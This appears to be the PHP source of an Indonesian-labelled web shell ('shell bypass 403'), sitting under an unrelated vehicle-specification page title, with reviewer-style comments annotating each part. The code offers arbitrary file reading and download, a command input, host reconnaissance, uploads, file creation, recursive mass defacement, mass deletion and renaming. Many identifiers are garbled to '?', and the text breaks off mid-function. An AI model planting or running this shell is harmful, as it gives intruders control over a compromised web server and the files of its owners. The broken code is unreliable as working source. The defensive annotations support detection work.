New Tiago / Tiago NRG SPECIFICATION
table{display:none;}
";
// HTML attribute fragment held in a variable; where it is used is not visible in this part of the file.
$_r = "required='required'";
// NOTE(review): only a line break survives in this literal on this page; the original markup was presumably stripped.
$_x = "
";
// File-download handler: runs when the `option` query parameter is present and
// the POSTed `opt` field equals 'download'.
// Neither request field is validated. `path` goes straight into
// file_get_contents(), so any file the PHP process can read is returned, and
// `name` is concatenated unescaped into the Content-Disposition header.
// Analyst note: a request with ?option= plus POST fields opt=download, path and
// name is a pattern to match on where request bodies are logged or inspected.
if(isset($_GET['option']) && $_POST['opt'] == 'download'){
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="'.$_POST['name'].'"');
echo(file_get_contents($_POST['path']));
// Stop here so the response body contains only the file, not the page output that follows.
exit();
}
// NOTE(review): the function name and its local variable are shown as `?` on
// this page; the original identifiers were lost in extraction.
// Returns the string $p wrapped in a literal chosen by whether the current path
// is writable. The path is the `path` query parameter when present, otherwise
// getcwd(); the $dir parameter is never read in the body.
// The two return literals are identical as shown, presumably because the markup
// that distinguished them was stripped.
function ?($dir,$p) {
if(isset($_GET['path'])) {
$? = $_GET['path'];
} else {
$? = getcwd();
}
// is_writable() is evaluated as the account PHP runs under.
if(is_writable($?)) {
return "
".$p." ";
} else {
return "
".$p." ";
}
}
// Emits the shell's "success" marker. Only a line break survives in the literal
// on this page; the original markup was presumably stripped.
// Returns nothing: callers concatenate ok() into an echo expression, so this
// output is written before the caller's own string.
function ok(){
echo '
';
}
// Emits the shell's "failure" marker. Only a line break survives in the literal
// on this page; the original markup was presumably stripped.
// Returns nothing: callers concatenate er() into an echo expression, so this
// output is written before the caller's own string.
function er(){
echo '
';
}
/**
 * Formats a byte count as a human-readable size string.
 *
 * The value is divided by 1024 until it drops below 1024 or the largest
 * unit (TB) is reached, then rounded to two decimals and joined to the
 * unit label with a single space.
 */
function sz($byt){
    $units = array('B', 'KB', 'MB', 'GB', 'TB');
    $lastUnit = count($units) - 1;
    $step = 0;
    // Stop at TB even when the value is still >= 1024.
    while ($byt >= 1024 && $step < $lastUnit) {
        $byt /= 1024;
        $step++;
    }
    $rounded = round($byt, 2);
    return $rounded . " " . $units[$step];
}
/**
 * Returns the first non-empty address-like value from the request environment.
 *
 * Every source except REMOTE_ADDR is derived from a request header, which the
 * client (or any intermediate proxy) can set freely, so the returned value is
 * not a reliable peer address. The fallback string is Indonesian for
 * "IP not recognised".
 */
function ip() {
    // Same precedence as the original if/else chain: forwarded-style headers
    // are consulted before the socket-level REMOTE_ADDR.
    $sources = array(
        'HTTP_CLIENT_IP',
        'HTTP_X_FORWARDED_FOR',
        'HTTP_X_FORWARDED',
        'HTTP_FORWARDED_FOR',
        'HTTP_FORWARDED',
        'REMOTE_ADDR',
    );
    foreach ($sources as $key) {
        $candidate = getenv($key);
        // Truthiness test on purpose: unset, empty and "0" are all skipped.
        if ($candidate) {
            return $candidate;
        }
    }
    return 'IP tidak dikenali';
}
/**
 * Renders a file's mode as an ls-style ten-character string (e.g. "-rw-r--r--").
 *
 * Returns "- ?? -" when fileperms() yields a falsy value, for example when the
 * path does not exist or cannot be stat'ed.
 */
function p($file){
    // Warnings are suppressed; failure is reported through the return value instead.
    $mode = @fileperms($file);
    if (!$mode) {
        return "- ?? -";
    }

    // File-type masks, tested in this order; the first match wins.
    $typeMasks = array(
        0xC000 => 's', // socket
        0xA000 => 'l', // symbolic link
        0x8000 => '-', // regular file
        0x6000 => 'b', // block device
        0x4000 => 'd', // directory
        0x2000 => 'c', // character device
        0x1000 => 'p', // FIFO
    );
    $text = 'u'; // unknown type unless a mask matches
    foreach ($typeMasks as $mask => $letter) {
        if (($mode & $mask) == $mask) {
            $text = $letter;
            break;
        }
    }

    // Nine permission bits from owner-read (0400) down to other-execute (0001).
    $letters = 'rwxrwxrwx';
    for ($n = 0; $n < 9; $n++) {
        $bit = 0400 >> $n;
        if ($mode & $bit) {
            $text .= $letters[$n];
        } else {
            $text .= '-';
        }
    }
    return $text;
}
// Page banner. Interpolates the request's Host header and $_n (assigned outside
// the visible text) into the output. The fixed text "shell bypass 403" is part
// of the page body and can serve as a content signature when scanning files or
// HTTP responses.
echo "
".$_SERVER['HTTP_HOST']." - $_n
shell bypass 403
$_n Shell ";
// Directory shown in the UI: the caller-supplied `path`, else the script's working directory.
if(isset($_GET['path'])){
$path = $_GET['path'];
} else {
$path = getcwd();
}
// Normalise Windows separators so the split below yields the same components on both platforms.
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
// Breadcrumb: one echo per path component. Components come from the request
// and are written into the page without escaping.
foreach($paths as $id=>$pat){
// An empty first component means the path started with "/" (filesystem root).
if($pat == '' && $id == 0){
// NOTE(review): $a is not read anywhere in the visible text.
$a = true;
echo '
:
/ ';
continue;
}
// Skip empty components produced by doubled or trailing slashes.
if($pat == '') continue;
echo '
'.$pat.' /';
}
// Appends the permission string of the current path, wrapped by the writability helper.
echo " [ ".?($path, p($path))." ]
";
echo "
";
// the tools (dispatcher for the ?id= features)
// A `path` query parameter also changes the process working directory, so
// relative file names used further down resolve inside that directory.
if(isset($_GET['path'])) {
$dir = $_GET['path'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\","/",$dir);
$scdir = explode("/", $dir);
// NOTE(review): $c_dir is not assigned in the visible text, and the loop body
// opens with a no-op expression and an empty branch; code or markup was
// presumably lost in extraction. The elseif chain below selects a tool by ?id=.
for($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if($i != $c_dir) {
// ?id=deface: mass file-write tool; its helper functions are declared inside this branch.
} elseif($_GET['id'] == 'deface'){
echo "$_s";
// Recursive mass write: places a file named $namafile with content $isi_script
// under $dir and every writable directory below it.
// Does nothing when $dir itself is not writable. Returns no value.
// NOTE(review): the local variable shown as `$?` lost its name in extraction;
// it holds the target file path for the current directory entry.
// Defender note: the effect is one file name with identical content appearing
// in many directories at once, which file-integrity monitoring or a search for
// same-hash files under the web root will surface.
function mass_kabeh($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$? = $dirc.'/'.$namafile;
// "." resolves to $dir itself.
if($dirb === '.') {
file_put_contents($?, $isi_script);
// ".." resolves to the parent of $dir, so the write also lands one level above the start directory.
} elseif($dirb === '..') {
file_put_contents($?, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[
] $?
";
file_put_contents($?, $isi_script);
// Descend into the subdirectory; the function returns nothing, so `$?` becomes null here.
$? = mass_kabeh($dirc,$namafile,$isi_script);
}
}
}
}
}
}
// One-level mass write: places a file named $namafile with content $isi_script
// in $dir, in its parent, and in each writable direct subdirectory. It does not
// recurse further. Does nothing when $dir is not writable. Returns no value.
// NOTE(review): the local variable shown as `$?` lost its name in extraction;
// it holds the target file path for the current directory entry.
function mass_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$? = $dirc.'/'.$namafile;
// "." resolves to $dir itself.
if($dirb === '.') {
file_put_contents($?, $isi_script);
// ".." resolves to the parent of $dir.
} elseif($dirb === '..') {
file_put_contents($?, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[
] $dirb/$namafile
";
file_put_contents($?, $isi_script);
}
}
}
}
}
}
// Trigger for the mass-write tool: any truthy POST `start` runs it. Target
// directory, file name and file content are all taken directly from the request.
if($_POST['start']) {
// `tipe` picks the variant: 'massal' calls the recursive helper, 'biasa' the one-level helper.
if($_POST['tipe'] == 'massal') {
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
} elseif($_POST['tipe'] == 'biasa') {
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
}
echo "
";
}
echo "
";
// ?id=cmd: copies POST `ekseCMD` into $cmd. Whatever consumes $cmd is not
// present in the visible text of this branch.
} elseif($_GET['id'] == 'cmd'){
if($_POST['ekseCMD']) {
$cmd = $_POST['ekseCMD'];
}
echo "$_s
";
// ?id=info: host information panel. Collects disable_functions, the account
// identity and the safe_mode setting for display.
} elseif($_GET['id'] == 'info'){
$disfunc = @ini_get("disable_functions");
if(empty($disfunc)) {
$disfc = "
NONE ";
} else {
$disfc = "
$disfunc ";
}
// Without the POSIX extension, fall back to get_current_user()/getmyuid()/getmygid(),
// which describe the owner of the script file rather than the effective process user.
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
// Effective user and group of the PHP process; $uid and $gid are first arrays, then reduced to the numeric ids.
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "
ON " : "
OFF ";
echo "$_s
";
// ?id=phpinfo: captures phpinfo() output in an output buffer and prints a slice of it.
} elseif($_GET['id'] == 'phpinfo'){
@ob_start();
// eval() of a constant string; the effect is the same as calling phpinfo() directly.
@eval("phpinfo();");
$buff = @ob_get_contents();
@ob_end_clean();
// NOTE(review): both strpos() needles are empty on this page, presumably tags
// removed by extraction; the +6 suggests a six-character opening tag. Confirm
// against the original file.
$awal = strpos($buff,"")+6;
$akhir = strpos($buff,"");
echo "
".substr($buff,$awal,$akhir-$awal)." ";
exit;
} elseif($_GET['id'] == 'upload'){
echo "$_s
';
} else {
echo 'Upload gagal! '.er().'
';
}
}
echo "
";
} elseif($_GET['id'] == 'filebaru') {
// ?id=filebaru ("new file"): creates or truncates files named in the request.
echo "$_s";
if(isset($_POST['bikin'])){
// `nama_file` is iterated as an array of names; `isi_file` is a single content string written to each.
$name = $_POST['nama_file'];
$isi_file = $_POST['isi_file'];
foreach ($name as $nama_file){
// Mode "w" truncates an existing file. The name is used exactly as supplied,
// with no filtering of separators or "..".
$handle = @fopen("$nama_file", "w");
if($isi_file){
$buat = @fwrite($handle, $isi_file);
} else {
// Empty content: success is judged by whether the file could be opened.
$buat = $handle;
}
}
// $buat holds only the last iteration's result, so the message reflects the
// last file only. The handles are never closed in this branch.
if($buat){
echo '
Buat file ok! '.ok().'
';
} else {
echo '
Buat file gagal! '.er().'
';
}
}
echo "
";
// ?id=dirbaru ("new directory"): creates directories named in the request.
} elseif($_GET['id'] == 'dirbaru'){
echo "$_s";
if(isset($_POST['buat'])){
$nama = $_POST['nama_dir'];
foreach ($nama as $nama_dir){
// Unlike the file tools in this part of the file, the name is filtered first:
// characters outside an allow-list (word characters, whitespace and some
// punctuation) and any run of two or more dots are removed. "/" and "\" are
// not on the list, so the result cannot contain a path separator.
$folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $nama_dir);
$fd = @mkdir ($folder);
}
// $fd holds only the last mkdir() result.
if($fd){
echo '
Buat dir ok! '.ok().'
';
} else {
echo '
Buat dir gagal! '.er().'
';
}
}
echo "
";
// ?id=delete: mass file-delete tool; its helper function is declared inside this branch.
} elseif($_GET['id'] == 'delete'){
echo "$_s";
// Mass delete: removes files named $namafile from $dir, from the parent of
// $dir, and from writable subdirectories. Does nothing when $dir is not
// writable. Returns no value.
// NOTE(review): the local variable shown as `$?` lost its name in extraction;
// it holds the candidate file path for the current directory entry.
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$? = $dirc.'/'.$namafile;
// "." entry: delete the file in $dir itself.
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
// ".." entry: delete the file in the parent directory, outside the start directory.
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namafile")) {
unlink("".dirname($dir)."/$namafile");
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
// Recursion happens only inside this check, so the walk descends only into
// subdirectories that themselves contained the file.
if(file_exists($?)) {
echo "[
] $?
";
unlink($?);
$? = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
// Trigger for the mass-delete tool: any truthy POST `start` runs it with the
// directory and file name taken directly from the request.
if($_POST['start']) {
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "
";
}
echo "
";
}
}
// end of tools
if(isset($_GET['filesrc'])){
echo "
name : ".basename($_GET['filesrc']);"";
echo '
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).' ';
} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '
name : '.basename($_POST['path']);'';
//rename file
if($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '
Rename ok! '.ok().'